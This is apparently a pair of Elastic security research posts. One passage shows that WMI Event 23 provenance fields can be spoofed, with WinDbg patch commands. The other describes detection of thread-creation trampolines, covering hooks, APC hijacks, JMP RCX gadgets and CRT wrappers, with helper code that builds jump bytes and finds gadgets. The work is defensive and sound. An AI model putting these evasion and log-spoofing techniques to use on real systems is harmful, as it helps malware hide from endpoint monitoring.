Unlike RPC, WMI natively supports end-to-end tracing via a CorrelationId which is a GUID that the WMI client passes to the server at the WMI layer so that WMI operations can be associated. However, for security use cases, we shouldn’t blindly trust client-supplied information for reasons previously mentioned.

But how was Microsoft determining the process id to log and was their approach something that could be replicated for other RPC Servers – possibly via an RPC server runtime hook?

We needed to find out where the data in that field came from. ETW conveniently provides the ability to record a stack trace when an event is generated and the Sealighter tool conveniently exposes this capability. Sealighter illustrates which specific ETW Write function is being called from which process.

In this case, the event was actually being written by ntdll!EtwEventWrite in the WMI Core Service (svchost.exe -k netsvcs -p -s Winmgmt) – not in the WMI Provider Host (WmiPrvSE.exe).

Putting a breakpoint on PublishWin32ProcessCreation, we see via parameter value inspection that the ClientProcessId is passed (on the stack) as the 10th parameter. We can then look at InspectWin32ProcessCreateExecution to determine where that value comes from.
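Finding a stack-passed parameter is simple arithmetic under the Microsoft x64 calling convention. Arguments 1 to 4 travel in RCX, RDX, R8 and R9. At function entry, [RSP] holds the return address, RSP+0x8 to RSP+0x27 is the 32-byte home space, and argument 5 onwards sit in consecutive 8-byte slots starting at RSP+0x28. Assuming the breakpoint is hit at function entry, before the prologue adjusts RSP, the 10th argument is at RSP+0x50. A WinDbg command such as `dd @rsp+0x50 L1` would then show the 32-bit ClientProcessId. The helper below is illustrative.

```python
def stack_arg_offset(n: int) -> int:
    """Offset from RSP, at function entry, of the n-th (1-based) integer
    argument under the Microsoft x64 calling convention."""
    if n < 5:
        raise ValueError("arguments 1-4 are passed in RCX, RDX, R8 and R9")
    # 8 bytes of return address + 4 * 8 bytes of home space = 0x28 for arg 5;
    # each later argument occupies the next 8-byte slot.
    return 8 * n
```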

A roughly tidied Ghidra decompilation of InspectWin32ProcessCreateExecution might resemble this:

We can see that the client process id comes from the CWbemNamespace object. Searching for references to this structure field, we find that it is only set in CWbemNamespace::Initialize. Our earlier stack trace started in wbemcore!CCoreQueue and this initialization appears to have occurred prior to queuing. So we could statically search for all locations where the initialization occurs or dynamically observe the actual code paths taken.

We know that this activity is being initiated over RPC, so one approach would be to place breakpoints on RPC send/receive functions in the client and server. An alternative might be to fire up Wireshark and examine the packet capture of the entire interaction when it occurs in cleartext over the network. We learned somewhat late in our research that Microsoft had excellent documentation for the WMI Protocol Initialization that explained much of this and might have saved a little time.

We took the first approach. The second parameter to InspectWin32ProcessCreateExecution is an IWbemContext – which allows the caller to provide additional information to providers. This is how the parameters to Win32\_Process::Create are being passed. What if the first parameter was related to the WMI Client passing additional context to the WMI Core?

IWbemLevel1Login::NTLMLogin stood out in the call traces as a good place to start looking.

And right next to its COM interface UUID was IWbemLoginClientID[Ex] which had a very interesting SetClientInfo call, which was documented on MSDN:

The WMI client calls wbemprox!SetClientIdentity which looks roughly like this:

IWbemLoginClientIDEx is currently undocumented, but we can infer the parameters from the values passed.

At this point, it looks like the client process is passing ClientMachineName, ClientMachineFQDN, ClientProcessId and ClientProcessCreationTime to the WMI Core. We can confirm this by changing the values and seeing if the ETW event logged by the WMI Core changes.

Using WinDbg, we set up a couple of quick patches to the WMI client process and then spawned a process via WMI:

windbg> bp wbemprox!SetClientIdentity+0xff "eu @rdx \"SPOOFED....\"; gc"
windbg> bp wbemprox!SetClientIdentity+0x1c4 "r r9=0n1337; eu @r8 \"SPOOFED.COM\"; gc"
PS> ([wmiclass]"ROOT\CIMv2:Win32_Process").Create("calc.exe")

Using SilkETW (or another ETW capture mechanism), we see the following event from the server process:

The server is blindly reporting the values provided by the client. This means that this event cannot be relied upon for un-breaking WMI process provenance trees as the adversary can control the client process id. Falsely reporting this information would be an interesting defense evasion, and a tough one to identify reliably.

Further, a remote adversary can actually pass in a ClientMachine name equal to the local hostname, and this WMI event will mistakenly log IsLocal as true. (See the earlier decompilation of InspectWin32ProcessCreateExecution.) This will make the event look like a suspicious local execution rather than lateral movement, and represents another defense evasion opportunity.
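The provenance problem can be summarised as a toy model. This is not Microsoft’s code. It is a hypothetical reconstruction based only on the behaviour described above: every client field is copied verbatim, and IsLocal is derived by comparing the claimed machine name to the server’s own hostname. The case-insensitive comparison is an assumption, and all names are illustrative.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ClientIdentity:
    """Values the WMI client supplies (per the SetClientIdentity analysis)."""
    client_machine: str
    client_machine_fqdn: str
    client_process_id: int
    client_process_creation_time: int


def build_event_23_fields(identity: ClientIdentity, local_hostname: str) -> dict:
    # Hypothetical model: nothing below is verified by the server.
    return {
        "ClientMachine": identity.client_machine,
        "ClientMachineFQDN": identity.client_machine_fqdn,
        "ClientProcessId": identity.client_process_id,
        "ClientProcessCreationTime": identity.client_process_creation_time,
        # Assumed comparison: a remote client that claims the server's own
        # hostname is reported as local.
        "IsLocal": identity.client_machine.lower() == local_hostname.lower(),
    }
```

Any field derived from `identity` is attacker-controlled, however trustworthy the process that writes the event.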

So, this isn’t an approach that other RPC servers should follow after all.

Conclusion

In trying to generically solve LRPC provenance, we unfortunately demonstrated that the one existing LRPC provenance data point is unreliable. This has been reported to Microsoft, where it was assessed as a next-version candidate bug that will be evaluated for future releases.

Our fervent hope is that the ultimate solution involves the creation of a documented API that allows a server LRPC thread to determine the client thread of a connection. This would provide endpoint security products with a reliable mechanism to identify operations being proxied through LRPC calls in an attempt to hide their origin.

More generally though, this research highlights the need for defenders to have a detailed understanding of data provenance. It is necessary but not sufficient to know that the data was logged by a trustworthy source such as the kernel or a server process. In addition, you must also understand whether the data was intrinsic to the event or provided by a potentially untrustworthy client. Otherwise adversaries will exploit the gaps.

Get-InjectedThreadEx – Detecting Thread Creation Trampolines

Wed, 07 Dec 2022 00:00:00 GMT

The prevalence of memory resident malware remains extremely high. Defenders have imposed significant costs on file-based techniques, and malware must typically utilize in-memory techniques to avoid detection. In Elastic's recently-published Global Threat Report, defense evasion is the most diverse tactic we observed and represents an area of rapid, continuous innovation.

It is convenient, and sometimes necessary, for memory-resident malware to create its own threads within its surrogate process. Many such threads can be detected with relatively low noise by identifying those which have a start address not backed by a Portable Executable (PE) image file on disk. This detection technique was originally conceived by Elastic's Gabriel Landau and Nicholas Fritts for the Elastic Endgame product. Shortly thereafter, it was released as a PowerShell script for the benefit of the community in the form of Get-InjectedThread with the help of Jared Atkinson and Elastic's Joe Desimone at the 2017 SANS Threat Hunting and IR Summit.

At a high level, this approach detects threads created with a user start address in unbacked executable memory. Unbacked executable memory itself is quite normal in many processes, such as those that do just-in-time (JIT) compilation of bytecode or scripts like .NET or JavaScript. However, that JIT’d code rarely manages its own threads; that is usually handled by the runtime or engine.

However, an adversary often has sufficient control to create a thread with an image-backed start address which will subsequently transfer execution to their unbacked memory. When this transfer is done immediately, it is known as a “trampoline” as you are quickly catapulted somewhere else.

There are four broad classes of trampolines – you can build your own from scratch, you can use an illusionary trampoline, you can repurpose something else as a trampoline, or you can simply find an existing trampoline.

In other words - hooks, hijacks, gadgets and functions.

Each of these will bypass our original unbacked executable memory heuristic.

I highly recommend these two excellent blogs as background:

Understanding and Evading Get-InjectedThread by Adam Chester.
Avoiding Get-InjectedThread for Internal Thread Creation by Christopher Paschen.

In this blog, we will demonstrate how to detect each of these classes of bypass and release an updated PowerShell detection script – Get-InjectedThreadEx.

CreateThread() overview

As a quick recap, the Win32 CreateThread() API lets you specify a pointer to a desired StartAddress which will be used as the entrypoint of a function that takes exactly one user-provided parameter.

So, CreateThread() is effectively a simple shellcode runner.

And its sibling, CreateRemoteThread() is effectively remote process injection.

The value of the lpStartAddress parameter is stored by the kernel in the Win32StartAddress field within the ETHREAD structure for that thread.

This value can be queried from user mode using the documented NtQueryInformationThread() syscall with the ThreadQuerySetWin32StartAddress information class. A subsequent call to VirtualQueryEx() can be used to make a second syscall requesting the basic memory information for that virtual address from the kernel. This includes an enumeration indicating whether the memory is a mapped PE image, a mapped file, or simply private memory.
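Once the start address and the memory type are known, the original heuristic reduces to a single comparison. The sketch below models VirtualQueryEx() with a list of regions. The MEM_* constants are the documented winnt.h values for MEMORY_BASIC_INFORMATION.Type, while `Region`, `region_type` and `is_suspicious_start` are hypothetical names. The protection check (is the region executable?) is omitted for brevity.

```python
from dataclasses import dataclass
from typing import List, Optional

# MEMORY_BASIC_INFORMATION.Type values from winnt.h.
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000


@dataclass(frozen=True)
class Region:
    base: int
    size: int
    type: int  # MEM_PRIVATE, MEM_MAPPED or MEM_IMAGE


def region_type(address: int, regions: List[Region]) -> Optional[int]:
    # Plays the role of VirtualQueryEx(): find the region containing the address.
    for r in regions:
        if r.base <= address < r.base + r.size:
            return r.type
    return None


def is_suspicious_start(win32_start_address: int, regions: List[Region]) -> bool:
    # Get-InjectedThread's core test: a start address not backed by a PE image.
    return region_type(win32_start_address, regions) != MEM_IMAGE
```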

While the original script was a point-in-time retrospective detection implementation, the same information is available inline during kernel thread-creation notification callbacks. All effective Endpoint Detection and Response (EDR) products should be providing telemetry of suspicious thread creations.

And all effective Endpoint Protection Platform (EPP) products should be denying suspicious thread creations by default – with a mechanism to add allowlist entries for legitimate software exhibiting this behavior.

In the wild, you’ll see “legitimate” instances of this behavior such as from other security products, anti-cheat software, older copy-protection software and some Unix products that have been shimmed to work on Windows. Though, in each instance, this security code smell may be indicative of software that you might not want in an enterprise environment. The use of these methods may be a leading indicator that other security best practices have not been followed. Even with this finite set of exceptions to handle, this detection and/or prevention approach remains highly relevant and successful today.

1 - Bring your own trampoline

The simplest trampoline is a small hook. The adversary only needs to write the necessary jump instruction into existing image-backed memory. This is the approach that Filip Olszak used to bypass Get-InjectedThread with DripLoader.

These bytes can even be restored to their original values immediately after thread creation. This helps to avoid retrospective detections such as our script – but recall that your endpoint security product should be doing inline detection and will be able to scrutinize the hooked thread entrypoint at execution time, and deny execution if necessary.

The above proof-of-concept hooks ntdll!DbgUiRemoteBreakin, which is a legitimate remote thread start address, though it should rarely be seen in production environments. In practice, the hook can be placed on the bytes of any function unlikely to be called in normal operation, or even in slack space between functions or at the end of a PE section.
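The proof-of-concept’s exact bytes aren’t reproduced here. A common x64 absolute jump that fits the 12-byte size mentioned later is `mov rax, imm64` (48 B8 followed by the 8-byte little-endian target) then `jmp rax` (FF E0). The sketch below assumes that form and only builds the byte sequence. The function name is hypothetical.

```python
import struct


def absolute_jump_rax(target: int) -> bytes:
    """12-byte x64 trampoline: mov rax, imm64 ; jmp rax (clobbers RAX)."""
    return b"\x48\xb8" + struct.pack("<Q", target) + b"\xff\xe0"
```

Writing these bytes over image-backed code is precisely the modification that the copy-on-write check below can surface.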

Also note the use of WriteProcessMemory() instead of a simple memcpy(). MEM_IMAGE pages are typically read only, and the former handles toggling the page protections to writable and back for us.

We can detect hooked start addresses fairly easily because we can detect persistent inline hooks fairly easily. In order to save memory, allocations for shared libraries use the same backing physical memory pages and are marked COPY_ON_WRITE in each process’s address space. So, as soon as the hook is inserted, the whole page can no longer be shared. Instead, a copy is created in the working set of the process.

Using the QueryWorkingSetEx() API, we can query the kernel to determine whether the page containing the start address is sharable or is in a private working set.
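QueryWorkingSetEx() returns, for each queried address, a PSAPI_WORKING_SET_EX_BLOCK bitfield. Its documented layout for resident pages starts with Valid (bit 0), ShareCount (bits 1 to 3), Win32Protection (bits 4 to 14) and Shared (bit 15). The sketch below decodes those fields from a raw integer, leaving the actual Windows call out. Treating "valid but not shared" as private follows the reasoning above. The helper names are illustrative.

```python
def decode_working_set_ex(flags: int) -> dict:
    """Decode the low fields of a PSAPI_WORKING_SET_EX_BLOCK (valid-page layout)."""
    return {
        "valid": flags & 0x1,
        "share_count": (flags >> 1) & 0x7,
        "win32_protection": (flags >> 4) & 0x7FF,
        "shared": (flags >> 15) & 0x1,
    }


def page_is_private(flags: int) -> bool:
    info = decode_working_set_ex(flags)
    # A resident image page that is no longer shared has been copied into this
    # process's private working set, e.g. by copy-on-write after a hook.
    # A non-resident page (valid == 0) tells us nothing either way.
    return bool(info["valid"]) and not info["shared"]


def page_base(address: int, page_size: int = 0x1000) -> int:
    return address & ~(page_size - 1)
```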

Now we know that something on the page was modified, but we don’t know whether our address was hooked. For our updated PowerShell script, this is all that we check. Recall that the bytes can be unhooked after the thread has started, so any further checks on already running threads could result in a false negative.

However, this could also be a false positive if there is a “legitimate” hook or other modification.

In particular, many, many security products still hook ntdll.dll. This was an entirely legitimate technical approach back in 2007 when Vista was released: it allowed existing x86 features based on kernel syscall hooks to be quickly ported to the nascent x64 architecture using user mode syscall hooks instead. The validity of such approaches has been more questionable since Windows 10 was released in 2015. Around this time, x64 was cemented as the primary Windows architecture and we could firmly relegate the less secure x86 Windows to legacy status. The value proposition for user mode hooking was further reduced in 2017 when Windows 10 Creators Update added additional kernel mode instrumentation to provide more robust detection approaches for malicious usage of certain abused syscalls.

For reference, our original Elastic Endgame product has features implemented using user mode hooks whereas our newer Elastic Endpoint has not yet determined a need to use a user mode hook at all in order to attain equal or better protection compared to Endgame. This means that Elastic Endgame must defend these hooks from tampering whereas Elastic Endpoint is currently invulnerable to the various so-called “universal EDR bypasses” that perform ntdll.dll unhooking.

Older security products aside, there are also many products that extend the functionality of other products via hooks, or perhaps unpack their code at runtime. So, if that 4KB page is private, security products additionally need to compare the start address bytes to a pristine original copy and alert if they differ.

And, to deploy at scale, they also need to maintain an allowlist for those rare legitimate uses.
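The follow-up check from the last two paragraphs can be sketched as a byte comparison plus an allowlist. The sketch assumes that both buffers are indexed by RVA and that the pristine copy has already had relocations applied. Otherwise, legitimately relocated bytes would differ too. The 16-byte window, the `(module, rva)` allowlist key and the function names are all illustrative assumptions.

```python
from typing import AbstractSet, Tuple


def start_bytes_modified(current: bytes, pristine: bytes, rva: int,
                         length: int = 16) -> bool:
    # Compare a small window at the start address with the on-disk image.
    return current[rva:rva + length] != pristine[rva:rva + length]


def should_alert(module: str, rva: int, current: bytes, pristine: bytes,
                 allowlist: AbstractSet[Tuple[str, int]]) -> bool:
    if (module.lower(), rva) in allowlist:
        return False  # known, rare legitimate modification
    return start_bytes_modified(current, pristine, rva)
```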

2 - Shifting the trampoline mat

Technically the security product will only be able to see the bytes at the time of the thread notification callback which is slightly before the thread executes. Malware could create a suspended thread, let the thread callback execute, and only then hook the start bytes before finally resuming the thread. Don’t worry though - effective security products can detect that inline too. But that’s a topic for another day.

This brings us to the second trampoline approach though: hijacking the execution flow before the entrypoint is ever called. Why obviously hook the thread entrypoint of our suspended thread when, with a little sleight of hand, we can usurp execution by modifying its instruction pointer directly (or an equivalent context manipulation) with SetThreadContext(), or by queuing an “early bird” Asynchronous Procedure Call (APC)?

The problem with creating the illusion of a legitimate entrypoint like this is that it doesn’t hold up to any kind of rigorous inspection.

In a normal thread, the user mode start address is typically the third frame from the base of the thread’s call stack, after ntdll!RtlUserThreadStart and kernel32!BaseThreadInitThunk. So when the thread has been hijacked, this is going to be obvious in the call stack.

For instruction pointer manipulation, the first frame will belong to the injected code.

For “early bird” APC injection, the base of the call stack will be ntdll!LdrInitializeThunk, ntdll!NtTestAlert, ntdll!KiUserApcDispatcher and then the injected code.

The updated script detects various anomalous call stack bases.

False positives are possible where legitimate software finds it necessary to modify Windows process or thread initialisation. For example, this was observed with the MSYS2 Linux environment. There is also an edge case where a function might have been generated with a Tail Call Optimisation (TCO), which eliminates unnecessary stack frames for performance. However, these cases can all be easily handled with a small exception list.
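The call stack base checks described in this section can be sketched over symbolised frames listed from the bottom of the stack upwards. The `<unbacked>` rendering for frames outside any image, the category labels and the exception-list format are hypothetical. This is not how the released script represents stacks.

```python
from typing import AbstractSet, Sequence

NORMAL_BASE = ("ntdll!RtlUserThreadStart", "kernel32!BaseThreadInitThunk")
EARLY_BIRD_BASE = ("ntdll!LdrInitializeThunk", "ntdll!NtTestAlert",
                   "ntdll!KiUserApcDispatcher")


def classify_stack_base(frames_base_first: Sequence[str],
                        exceptions: AbstractSet[str] = frozenset()) -> str:
    """Classify a thread by its outermost frames (sketch).

    Frames are listed from the base of the stack; frames outside any image
    are assumed to be rendered as "<unbacked>".
    """
    frames = tuple(frames_base_first)
    if frames[:len(NORMAL_BASE)] == NORMAL_BASE:
        return "normal"
    if frames[:len(EARLY_BIRD_BASE)] == EARLY_BIRD_BASE:
        return "early_bird_apc"   # anomalous: APC queued before the entrypoint
    if frames and frames[0] in exceptions:
        return "allowlisted"      # e.g. custom process/thread initialisation
    return "anomalous"            # e.g. instruction pointer manipulation
```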

3 - If it walks like a trampoline, and it talks like a trampoline...

The third trampoline approach is to find a suitable gadget within image-backed memory so that no code modification is necessary. This is one of the approaches that Adam Chester employed in his blog.

Our earlier hook was 12 bytes and finding an exact 12-byte gadget is unlikely in practice.

However, on x64 Windows, functions use a four-register fast-call calling convention by default. So when the OS calls our gadget we will have control over the RCX register which will contain the parameter we passed into CreateThread().

The simplest x64 gadget is the two-byte JMP RCX instruction “ff e1” – which is fairly trivial to find.

Gadgets don’t even need to be instructions per se – they could be within operands or other data in the code section. For example, the above “ff e1” gadget in ntdll.dll was part of the relative address of a GUID.
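Finding such gadgets is a raw byte search, which is why hits inside operands and data are just as usable as real instructions. The sketch below scans a code buffer for the two-byte `JMP RCX` encoding (FF E1). The example buffer is synthetic. It contains one genuine `jmp rcx` and one match hidden in the displacement of a `lea rax, [rip+0xe1ff]`.

```python
from typing import List

JMP_RCX = b"\xff\xe1"


def find_gadgets(code: bytes, base: int, pattern: bytes = JMP_RCX) -> List[int]:
    """Virtual address of every byte-level occurrence of pattern in code,
    including matches that straddle instructions or sit inside operands."""
    hits = []
    i = code.find(pattern)
    while i != -1:
        hits.append(base + i)
        i = code.find(pattern, i + 1)
    return hits
```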

We can detect this too, because it doesn’t work generically yet.

In all modern Windows software, thread start addresses are protected by Control Flow Guard (CFG) which has a bitmap of valid indirect call targets computed at compile time. In order to use this gadget, malware must either first disable CFG or call the SetProcessValidCallTargets() function to ask the kernel to dynamically set the bit corresponding to this gadget in the CFG bitmap.

Just to be clear: this is not a CFG bypass. It is a CFG feature to support legitimate software doing weird things. Remember that CFG is an exploit protection, and being able to call SetProcessValidCallTargets() in order to call CreateThread() is a chicken-and-egg problem for exploit developers.

Like before, to save memory, the CFG bitmap pages for DLLs are also shared between processes. This time we can detect whether the start address’s CFG bitmap entry is on a sharable page or in a private working set, and alert if it is private.

Control Flow Guard is described in detail elsewhere, but a high-level CFG overview here helps in understanding our approach to detection. Each pair of bits in the CFG bitmap corresponds to 16 addresses, and two bits give us four states. Specifically, in a pretty neat optimization by Microsoft, two states correspond only to the 16-byte aligned address (allowed, and export suppressed) and two states correspond to all 16 addresses (allowed and denied).

Modern CPUs fetch instructions in 16-byte lines, so modern compilers typically align the vast majority of function entrypoints to 16 bytes. The vast majority of CFG entries only mark a single address as a valid indirect call target, and very few entries specify a whole block of 16 addresses as valid call targets. This means that the CFG bitmap can be an eighth of the size of a bitmap with one bit per address, without any appreciable increase in the risk of valid gadgets due to an overly permissive bitmap.

However, if each pair of bits corresponds to 16 addresses, then a private 4K page of CFG bits corresponds to 256KB of code. That’s quite the false positive potential!
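The sizing arithmetic in the last two paragraphs can be checked directly. The constants below are the figures quoted in the text; `bitmap_page_index` is a hypothetical helper that assumes offsets are measured from the start of the bitmap.

```python
"""Back-of-the-envelope CFG bitmap sizing using the article's figures:
2 bits per 16 bytes of address space and 4 KB bitmap pages."""

BITS_PER_ENTRY = 2
BYTES_PER_ENTRY = 16
PAGE_SIZE = 4096

# Versus one bit per byte of address space, the bitmap is 8x smaller.
bits_per_code_byte = BITS_PER_ENTRY / BYTES_PER_ENTRY  # 0.125

# Code covered by one bitmap page: (4096 * 8 bits) / 2 bits * 16 bytes.
code_per_bitmap_page = PAGE_SIZE * 8 // BITS_PER_ENTRY * BYTES_PER_ENTRY


def bitmap_page_index(address: int) -> int:
    """Index of the bitmap page holding the entry for `address`
    (hypothetical helper; offsets relative to the bitmap base)."""
    bit_offset = (address // BYTES_PER_ENTRY) * BITS_PER_ENTRY
    return bit_offset // 8 // PAGE_SIZE


if __name__ == "__main__":
    print(bits_per_code_byte, code_per_bitmap_page // 1024, "KB")
```

Any two addresses with the same page index share one bitmap page, so making that single page private affects the entries for the whole 256KB span around it.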

Therefore, we just have to hope that legitimate code never does this… never mind. You should never hope that legitimate code won’t do obscure things. To date, we’ve identified three contemporary scenarios:

The legacy Edge browser would harden its JavaScript host process by clearing the CFG bits for certain abusable functions
user32.dll appears to be too kind to legacy software, and will un-suppress export addresses if they are registered as callback functions
Some security products drop a page of hook trampolines too close to legitimate modules; because private executable memory always has private bitmap entries, the bitmap page that also covers the nearby module ends up private (in fact, they’ll often drop this page at a module’s preferred load address, which prevents the OS from sharing memory for that module)

So we need to rule out false positives by comparing against an expected CFG bitmap value. We could read this from the PE file on disk, but the x64 bitmap is already mapped into our process as part of the shared CFG bitmap.

The PowerShell script implementation we’ve released alerts on both cases: a modified CFG page and a start address with a non-original CFG value.
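One possible reading of the two alert cases is sketched below in Python; it is an illustration, not the released script’s logic. The inputs are hypothetical: `observed` and `expected` are the same range of bitmap bytes taken from the target process and from the shared bitmap mapped into the scanning process, `base` is the first address that range covers, and `page_is_private` would come from a working-set query (for example, the Shared flag reported by QueryWorkingSetEx).

```python
from typing import List


def changed_blocks(observed: bytes, expected: bytes, base: int = 0) -> List[int]:
    """Start address of every 16-byte block whose 2-bit CFG entry differs.

    Each bitmap byte holds four 2-bit entries, so byte i, slot s covers the
    block starting at base + (4 * i + s) * 16.
    """
    changed = []
    for i, (o, e) in enumerate(zip(observed, expected)):
        diff = o ^ e
        for slot in range(4):
            if (diff >> (slot * 2)) & 0b11:
                changed.append(base + (4 * i + slot) * 16)
    return changed


def classify_start_address(start: int, page_is_private: bool,
                           observed: bytes, expected: bytes,
                           base: int = 0) -> List[str]:
    """Return the reasons (possibly none) to alert on a thread start address."""
    reasons = []
    changed = changed_blocks(observed, expected, base)
    if page_is_private and changed:
        reasons.append("modified CFG page")
    if start - (start % 16) in changed:   # block containing the start address
        reasons.append("non-original CFG value")
    return reasons
```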

A very small number of CFG-compatible gadgets might exist at a given point in time, but only in very specific DLLs that will likely appear anomalous in the surrogate process.

4 - It's literally already a trampoline

The fourth bypass category is to find an existing function that does exactly what we want, and there are many of these. For example, Christopher Paschen highlighted Microsoft’s C Runtime (CRT). This implementation of the C standard library works as an API layer that sits above Win32, and it includes thread creation APIs.

These APIs (such as _beginthreadex()) perform some extra CRT bookkeeping on thread creation and destruction. They pass an internal CRT thread entrypoint to CreateThread(), and store the user entrypoint, which the CRT subsequently calls, in the structure pointed to by the CreateThread() parameter.

So, in this case, the observed Win32StartAddress will be the non-exported msvcrt!_startthread(ex). The shellcode address will be stored at a specific offset from the thread parameter during thread creation (Microsoft CRT source is available), and the shellcode will be the next frame on the call stack after the CRT.
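Unwrapping the CRT trampoline amounts to reading a pointer out of the thread parameter. In this Python sketch, `param_bytes`, `ptr_offset`, and `crt_start_routines` are hypothetical inputs. The offset of the user procedure pointer depends on the CRT version, so take it from the CRT source rather than from this example. A 64-bit little-endian pointer is assumed.

```python
import struct
from typing import Optional, Set


def crt_user_entrypoint(start_address: int, param_bytes: bytes,
                        ptr_offset: int,
                        crt_start_routines: Set[int]) -> Optional[int]:
    """Return the user entrypoint if `start_address` is a known CRT thread
    trampoline, otherwise None (the start address is already the real one).

    `crt_start_routines` is a hypothetical set of resolved addresses of the
    CRT's internal thread entrypoints; `param_bytes` is memory read from the
    CreateThread() parameter at thread creation time.
    """
    if start_address not in crt_start_routines:
        return None
    # Hypothetical layout: a 64-bit little-endian procedure pointer at ptr_offset.
    (user_entry,) = struct.unpack_from("<Q", param_bytes, ptr_offset)
    return user_entry
```

The recovered address can then go through the same checks as any other start address, and should match the next frame on the call stack after the CRT.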

Note: the CRT has no CreateRemoteThread() equivalent, so without additional tricks this can only be used to create in-process threads. Those tricks exist, however, and you should not expect this module to be the start address of remote threads.

Unfortunately, there is no operating system bookkeeping that will tell you after the fact whether a thread was created remotely. Consequently, we can’t scan for this with our script, but the inline callbacks used by security products can make this distinction.

Currently, the script simply traverses the stack bottom-up and infers the first handful of frames by looking at candidate return addresses. This code could definitely be improved via disassembly or unwind information, both of which are less rewarding to implement in PowerShell. The current approach is reliable enough for demonstration purposes.
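A minimal version of this kind of bottom-up scan might look like the following Python sketch, which is not necessarily what the script itself does. It assumes `stack` is a list of qwords ordered from the stack base downwards and `read_code` is a hypothetical callback returning the bytes of executable image memory that end just before an address. A value counts as a candidate return address if the bytes before it match one of three common call encodings; this is a simplification of what disassembly or unwind data would provide, and coincidental matches are possible.

```python
from typing import Callable, List

# Hypothetical callback: (address, n) -> the n bytes ending just before
# `address`, or b"" if that range is not readable executable memory.
ReadCode = Callable[[int, int], bytes]


def looks_like_return_address(read_code: ReadCode, value: int) -> bool:
    """True if the bytes before `value` end with a common x64 call encoding."""
    before = read_code(value, 6)
    if len(before) < 6:
        return False                                     # not backed by code
    if before[-5] == 0xE8:                               # call rel32
        return True
    if before[-6] == 0xFF and before[-5] == 0x15:        # call [rip+disp32]
        return True
    if before[-2] == 0xFF and 0xD0 <= before[-1] <= 0xD7:  # call reg
        return True
    return False


def infer_outer_frames(stack: List[int], read_code: ReadCode,
                       max_frames: int = 4) -> List[int]:
    """Walk qwords from the stack base downwards, keeping plausible
    return addresses until `max_frames` have been found."""
    frames: List[int] = []
    for value in stack:
        if looks_like_return_address(read_code, value):
            frames.append(value)
            if len(frames) == max_frames:
                break
    return frames
```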

The updated script detects the original suspicious thread in addition to the four classes of bypass described in this research.

Hunting suspicious thread creations

In addition to detections for the four known major classes of thread start address trampolines, the updated script also includes some additional heuristics. Some of these have medium false positive rates and are hidden behind an -Aggressive flag. However, they may still be useful in hunting scenarios.

[Figure: prolog byte regex]

The first heuristic looks at the starting bytes of the thread’s user entrypoint. Function prologs have structure, except when they don’t. There is no decompiler in PowerShell as far as we know, so we approximated prolog recognition with a byte pattern regular expression instead. Flagging code that doesn’t follow convention is useful, but such code could easily be legitimate output from a compiler that we haven’t tested against.
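A prolog check in the same spirit can be written as an anchored bytes regular expression. The alternatives below are an illustrative, deliberately incomplete set of common x64 prolog openings chosen for this example; they are not the pattern used by the released script. The “MZ” alternative anticipates the CLR case discussed next.

```python
import re

# Illustrative only: common x64 prolog openings, not the script's regex.
PROLOG = re.compile(
    rb"^(?:"
    rb"\x48\x89[\x4c\x54\x5c\x6c\x74\x7c]\x24"  # mov [rsp+disp8], rcx/rdx/rbx/rbp/rsi/rdi
    rb"|\x4c\x89[\x44\x4c]\x24"               # mov [rsp+disp8], r8/r9
    rb"|\x48[\x81\x83]\xec"                   # sub rsp, imm32 / imm8
    rb"|\x48\x8b\xc4"                         # mov rax, rsp
    rb"|\x4c\x8b\xdc"                         # mov r11, rsp
    rb"|\x40[\x53\x55-\x57]"                  # push rbx/rbp/rsi/rdi with REX prefix
    rb"|\x41[\x54-\x57]"                      # push r12..r15
    rb"|[\x53\x55-\x57]"                      # push rbx/rbp/rsi/rdi
    rb"|\x4d\x5a"                             # "MZ": CLR image base as entrypoint
    rb")"
)


def looks_like_prolog(entry_bytes: bytes) -> bool:
    """True if the first bytes at a thread entrypoint match a known opening."""
    return PROLOG.match(entry_bytes) is not None
```

Shellcode commonly begins with instructions outside such a list (for example `cld` followed by stack alignment), which is what makes this cheap check useful despite its false positive rate.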

Interestingly, we had to account for the “MZ” magic bytes of a DOS executable header appearing as a purportedly valid thread entrypoint. The Windows loader ignores the value of the AddressOfEntryPoint field in the PE header for Common Language Runtime (CLR) executables such as .NET assemblies.

Instead, execution always starts in MsCorEE!_CorExeMain() in the CLR runtime, which determines the actual process entrypoint from the CLR metadata. This makes sense, as a CLR assembly might contain only bytecode that needs to be JIT’d by the runtime before being called. However, the value of this field is still passed to CreateThread(), and it is often zero. A zero entrypoint offset resolves to the image base itself, which results in the unexpected MZ entrypoint bytes.
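The “MZ” start address falls out of simple arithmetic: the start address is the image base plus AddressOfEntryPoint, so an offset of zero points at the DOS header. The Python sketch below assumes `image` holds the first bytes of the mapped image and uses the standard PE layout (e_lfanew at 0x3C, the optional header after the 4-byte signature and 20-byte file header, AddressOfEntryPoint at offset 16 of the optional header).

```python
import struct


def entrypoint_address(image: bytes, image_base: int) -> int:
    """Compute ImageBase + AddressOfEntryPoint from in-memory PE headers."""
    if image[:2] != b"MZ":
        raise ValueError("missing DOS header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # Optional header starts after the signature (4) and IMAGE_FILE_HEADER (20);
    # AddressOfEntryPoint is at offset 16 for both PE32 and PE32+.
    (entry_rva,) = struct.unpack_from("<I", image, e_lfanew + 4 + 20 + 16)
    return image_base + entry_rva
```

With a zero AddressOfEntryPoint, the returned address is the image base, and the bytes there are the “MZ” header rather than code.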

The second heuristic examines the bytes immediately preceding the user entrypoint. These are usually the end of a return, a jump, or filler bytes. Common filler bytes are zero, nop (0x90), and int 3 (0xCC). However, this is only a convention.
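The preceding-byte check might be sketched as follows. The accepted encodings (ret C3, ret imm16 C2, jmp rel8 EB, jmp rel32 E9, plus the filler bytes above) are a small illustrative subset chosen for this example, and `code` and `offset` are assumed to be a buffer of module bytes and the entrypoint’s offset within it.

```python
FILLER = {0x00, 0x90, 0xCC}  # zero padding, nop, int 3


def preceded_conventionally(code: bytes, offset: int) -> bool:
    """Check the bytes just before a candidate entrypoint at `offset`.

    Accepts filler or ret (C3) as the final byte, or a ret imm16 (C2 iw),
    jmp rel8 (EB) or jmp rel32 (E9) ending right before the entrypoint.
    The multi-byte checks can match by coincidence; this is a heuristic.
    """
    if offset < 1:
        return True  # nothing to inspect at the start of the buffer
    prev = code[offset - 1]
    if prev in FILLER or prev == 0xC3:
        return True
    if offset >= 2 and code[offset - 2] == 0xEB:
        return True
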